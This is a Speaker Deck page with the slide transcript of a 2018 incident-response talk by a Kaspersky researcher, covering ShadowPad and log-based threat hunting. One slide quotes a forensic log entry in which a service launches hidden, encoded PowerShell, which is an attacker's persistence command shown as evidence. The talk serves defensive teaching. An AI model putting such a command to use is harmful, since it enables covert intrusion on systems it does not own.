Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Speaker Deck
PRO
Sign in
Sign up for free
Sergey Golovanov - Indecent Response 2018
DC7499
February 10, 2018
Education
0
320
Sergey Golovanov - Indecent Response 2018
DC7499
February 10, 2018
Tweet
Share
More Decks by DC7499
See All by DC7499
Sergey Sobko - Hackashop: Hackathon + Pentest + Workshop [RU]
defcon
0
290
Dmitry Sklyarov - Intel ME: Security keys Genealogy, Obfuscation and other Magic
defcon
0
180
Anton Lopanitsyn - Initial reconnaissance of web applications.
defcon
0
230
Dmitry Volkov - Private messengers: without pain??
defcon
1
200
Andrey Skuratov and Sergey Migalin - DNS tunneling in 2018. What is that, and what to do with it?
defcon
1
170
Sergey Belov - Another side of Bug Bounty programs
defcon
0
200
Dmitry Sklyarov - Intel ME: Flash file system explained
defcon
0
300
Maxim Goryachiy & Mark Ermolov - Inside Intel Management Engine
defcon
0
360
Kupreev Oleg & Putin Vladimir - Your very own driver for the custom NVMe device from the scratch: reading of the flash memory of iPhone 7
defcon
1
390
Other Decks in Education
See All in Education
Metzitli
marieffs
0
150
How learning Chinese made me a better Python instructor
reuven
0
330
多様なメンター、多様な基準
yasulab
4
14k
0615
cbtlibrary
0
110
數學、程式和機器
ccckmit
1
610
東京大学深層学習(Deep Learning基礎講座2022)深層学習と自然言語処理
verypluming
25
19k
Virtual and Augmented Reality - Lecture 10 - Next Generation User Interfaces (4018166FNR)
signer
PRO
0
660
ITエンジニアも経営スキルを身につけよう 第2回
lsuzuki
2
190
使える!数学!応用数学入門 / Introduction of applied mathematics
konakalab
0
380
My toolbox is full of shiny tools, do I also need super powers?
minecr
0
130
ITエンジニアも経営スキルを身につけよう 第3回
lsuzuki
0
170
0622
cbtlibrary
0
120
Featured
See All Featured
Designing for humans not robots
tammielis
241
24k
Practical Orchestrator
shlominoach
178
8.7k
The Brand Is Dead. Long Live the Brand.
mthomps
46
2.7k
Atom: Resistance is Futile
akmur
255
20k
The World Runs on Bad Software
bkeepers
PRO
57
5.4k
Java REST API Framework Comparison - PWX 2021
mraible
PRO
11
4.8k
Designing for Performance
lara
597
63k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
151
13k
How to name files
jennybc
40
63k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
269
12k
Pencils Down: Stop Designing & Start Developing
hursman
113
9.8k
10 Git Anti Patterns You Should be Aware of
lemiorhan
638
52k
Transcript
Indecent response 2018 Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky
Lab
Challenge: find a SDC bus speed
None
Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2
1.Shadowpad
Case overview: 1.Antifraud system in a bank is detecting printing
of a lot of elite cards for the last several hours 2.Bank is starting network audit 3.Bank is discovering suspicion DNS requests 4.Forensics can not find malware on PCs 5.Bank asks for help…
DNS requests
None
None
“Our worldwide customers range from small businesses right up to
global Fortune 500 companies.” NetSarang AmericanExpress BankofAmericaCorp. BankofChina BNPParibas Citigroup DeutscheBank Fortis GeneralElectric INGGroup MerrillLynch MorganStanley ShinhanFinancialGroup SocieteGenerale UBS https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsara ng.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru
https://securelist.com/shadowpad -in-corporate-networks/81432/
What was done?
AutoMA – static analysis framework
Shadowpad after autoMA
Miniduke after autoMA
2.0x403AA91EE
Case overview:
None
None
How to find suspicion DNS requests? sort | uniq -c
| sort -rn
How to find suspicion powershell? sort | uniq -c |
sort -rn
parse_evtx.exe System.evtx | findstr /i "power" | more Record #2396788
2027.02.22-08:03:00 'Computer':PC1', 'Channel':'System', 'EventSourceName':'Service Control Manager', 'Guid':‘GUID'Name':'Service Control Manager', 'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04, 'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the system.), 'Qualifiers':16384, 'Keywords':8080000000000000, 'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692, 'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID, 'ServiceName':‘1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5A FMAdAByAGUAYQBtACgA
https://github.com/KasperskyLab/ForensicsTools/
3.Scanner2
Case overview: 1. No money 2. No logs 3. No
team 4. No idea about network 5. CISO!
What to do? we need logs we need mfts we
need regs
WE NEED TO RECOMPILE EVERYTHING!
Awesome batch file
How to find something suspicion ? sort | uniq -c
| sort -rn
https://cdn.securelist.com/files/ 2017/12/HappyNewYear.zip
4. PLANS
1. MFT is a hell. Sleuthkit is not enough. We
need more data about deleted files. 2. USN J is required with no HDD touch. 3. Reg analysis is needed with unallocated part.
Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2
Зачем?
None
Thank you! Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky Lab